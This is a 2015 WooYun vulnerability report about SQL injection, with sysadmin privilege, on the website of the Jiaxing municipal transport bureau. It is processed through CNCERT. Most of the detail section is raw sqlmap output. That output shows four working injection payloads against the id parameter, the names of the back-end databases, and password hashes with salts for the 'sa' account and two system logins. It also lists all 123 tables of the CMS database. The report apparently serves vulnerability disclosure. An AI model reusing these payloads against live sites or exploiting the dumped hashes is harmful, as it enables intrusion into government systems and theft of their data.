当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140913

漏洞标题:嘉兴市交通运输局SQL注入漏洞(SA权限)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-16 21:44

修复时间:2015-11-02 15:28

公开时间:2015-11-02 15:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-18: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-28: 细节向核心白帽子及相关领域专家公开
2015-10-08: 细节向普通白帽子公开
2015-10-18: 细节向实习白帽子公开
2015-11-02: 细节向公众公开

简要描述:

嘉兴市交通运输局SQL注入漏洞(SA权限,可以getshell )

详细说明:

注入点:http://**.**.**.**/list.aspx?id=363110810873
发现是SA权限 直接可以获取SA密码 可以 getshell 

sqlmap identified the following injection points with a total of 0 HTTP(s) 
requ
sts:
---
Place: GET
Parameter: id
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING 
clause
    Payload: id=363110810873' AND 7920=CONVERT(INT,(CHAR(58) CHAR(116) 
CHAR(112
 CHAR(99) CHAR(58) (SELECT (CASE WHEN (7920=7920) THEN CHAR(49) ELSE CHAR
(48) E
D)) CHAR(58) CHAR(104) CHAR(112) CHAR(106) CHAR(58))) AND 'WTqa'='WTqa
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id=363110810873' UNION ALL SELECT CHAR(58) CHAR(116) CHAR
(112) CHA
(99) CHAR(58) CHAR(107) CHAR(98) CHAR(103) CHAR(113) CHAR(101) CHAR(119) 
CHAR(8
) CHAR(86) CHAR(79) CHAR(71) CHAR(58) CHAR(104) CHAR(112) CHAR(106) CHAR
(58)--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=363110810873'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=363110810873' WAITFOR DELAY '0:0:5'--
---
[16:28:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[16:28:43] [INFO] fetching database names
[16:28:43] [INFO] the SQL query used returns 5 entries
[16:28:43] [INFO] retrieved: "cms_jtj"
[16:28:44] [INFO] retrieved: "master"
[16:28:44] [INFO] retrieved: "model"
[16:28:44] [INFO] retrieved: "msdb"
[16:28:44] [INFO] retrieved: "tempdb"
available databases [5]:
[*] cms_jtj
[*] master
[*] model
[*] msdb
[*] tempdb
available databases [5]:
[*] cms_jtj
[*] master
[*] model
[*] msdb
[*] tempdb
current database:    'cms_jtj'    123 entries
current user:    'sa'
database management system users [3]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x010056f48a270628975b6e65ed5fc0013ecb153f1c1706caa0b2
        header: 0x0100
        salt: 56f48a27
        mixedcase: 0628975b6e65ed5fc0013ecb153f1c1706caa0b2
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x0100202aca560ba44876cfecb8398528ba774ea24cb8252d5d80
        header: 0x0100
        salt: 202aca56
        mixedcase: 0ba44876cfecb8398528ba774ea24cb8252d5d80
[*] sa [1]:
    password hash: 0x0100aa6f5410a22fcf3369c32b0c8230ac3239d605fd8789dc49
        header: 0x0100
        salt: aa6f5410
        mixedcase: a22fcf3369c32b0c8230ac3239d605fd8789dc49
current user is DBA:    True


1.png


2.png


3.png


4.png


漏洞证明:

可以获得管理员的账号密码。。。。

Database: cms_jtj
[123 tables]
+---------------------------------+
| CountTime                       |
| D99_Tmp                         |
| Zjczfs_Collect_News             |
| Zjczfs_Collect_Rule             |
| Zjczfs_Collect_RuleApply        |
| Zjczfs_Collect_Site             |
| Zjczfs_Collect_SiteFolder       |
| Zjczfs_DBBak                    |
| Zjczfs_Form_gkyjx               |
| Zjczfs_Form_zxts                |
| Zjczfs_LmNews_Hit               |
| Zjczfs_News_URL                 |
| Zjczfs_Sys_Help                 |
| Zjczfs_User_URL                 |
| Zjczfs_User_URLClass            |
| Zjczfs_Vote_Score               |
| Zjczfs_ads                      |
| Zjczfs_ads_class                |
| Zjczfs_ads_stat                 |
| Zjczfs_adstxt                   |
| Zjczfs_api_commentary           |
| Zjczfs_api_faviate              |
| Zjczfs_api_navi                 |
| Zjczfs_api_pop                  |
| Zjczfs_api_qmenu                |
| Zjczfs_customform               |
| Zjczfs_customform_item          |
| Zjczfs_define_class             |
| Zjczfs_define_data              |
| Zjczfs_define_save              |
| Zjczfs_friend_class             |
| Zjczfs_friend_link              |
| Zjczfs_friend_pram              |
| Zjczfs_mail                     |
| Zjczfs_news                     |
| Zjczfs_newsWithClass            |
| Zjczfs_news_Class               |
| Zjczfs_news_Gen                 |
| Zjczfs_news_JS                  |
| Zjczfs_news_JSFile              |
| Zjczfs_news_JST_Class           |
| Zjczfs_news_JSTemplet           |
| Zjczfs_news_Mark                |
| Zjczfs_news_MeiTi               |
| Zjczfs_news_page                |
| Zjczfs_news_site                |
| Zjczfs_news_special             |
| Zjczfs_news_sub                 |
| Zjczfs_news_topline             |
| Zjczfs_news_unNews              |
| Zjczfs_news_vote                |
| Zjczfs_old_news                 |
| Zjczfs_special_news             |
| Zjczfs_stat_Info                |
| Zjczfs_stat_class               |
| Zjczfs_stat_content             |
| Zjczfs_stat_param               |
| Zjczfs_sys_City                 |
| Zjczfs_sys_FieldClass           |
| Zjczfs_sys_FieldData            |
| Zjczfs_sys_Label                |
| Zjczfs_sys_LabelClass           |
| Zjczfs_sys_LabelFree            |
| Zjczfs_sys_LabelStyle           |
| Zjczfs_sys_PSF                  |
| Zjczfs_sys_PramUser             |
| Zjczfs_sys_Pramother            |
| Zjczfs_sys_Province             |
| Zjczfs_sys_SiteTask             |
| Zjczfs_sys_User                 |
| Zjczfs_sys_UserLevel            |
| Zjczfs_sys_admin                |
| Zjczfs_sys_admingroup           |
| Zjczfs_sys_channel              |
| Zjczfs_sys_channelclass         |
| Zjczfs_sys_channellabel         |
| Zjczfs_sys_channellabelclass    |
| Zjczfs_sys_channelspecial       |
| Zjczfs_sys_channelstyle         |
| Zjczfs_sys_channelstyleclass    |
| Zjczfs_sys_channelvalue         |
| Zjczfs_sys_logs                 |
| Zjczfs_sys_newsIndex            |
| Zjczfs_sys_param                |
| Zjczfs_sys_parmConstr           |
| Zjczfs_sys_parmPrint            |
| Zjczfs_sys_styleclass           |
| Zjczfs_sys_userfields           |
| Zjczfs_sys_userother            |
| Zjczfs_user_Card                |
| Zjczfs_user_Constr              |
| Zjczfs_user_ConstrClass         |
| Zjczfs_user_Discuss             |
| Zjczfs_user_DiscussActive       |
| Zjczfs_user_DiscussActiveMember |
| Zjczfs_user_DiscussClass        |
| Zjczfs_user_DiscussContribute   |
| Zjczfs_user_DiscussMember       |
| Zjczfs_user_DiscussTopic        |
| Zjczfs_user_Friend              |
| Zjczfs_user_FriendClass         |
| Zjczfs_user_Ghistory            |
| Zjczfs_user_Group               |
| Zjczfs_user_Guser               |
| Zjczfs_user_MessFiles           |
| Zjczfs_user_Message             |
| Zjczfs_user_Photo               |
| Zjczfs_user_Photoalbum          |
| Zjczfs_user_PhotoalbumClass     |
| Zjczfs_user_Requestinformation  |
| Zjczfs_user_constrPay           |
| Zjczfs_user_history             |
| Zjczfs_user_news                |
| Zjczfs_user_note                |
| Zjczfs_user_userlogs            |
| Zjczfs_user_vote                |
| Zjczfs_vote_Category            |
| Zjczfs_vote_Item                |
| Zjczfs_vote_Steps               |
| Zjczfs_vote_class               |
| Zjczfs_vote_manage              |
| Zjczfs_vote_param               |
| Zjczfs_vote_title               |
+---------------------------------+


5.png


6.png


7.png


修复方案:

过滤。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-09-18 15:26

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置.

最新状态:

暂无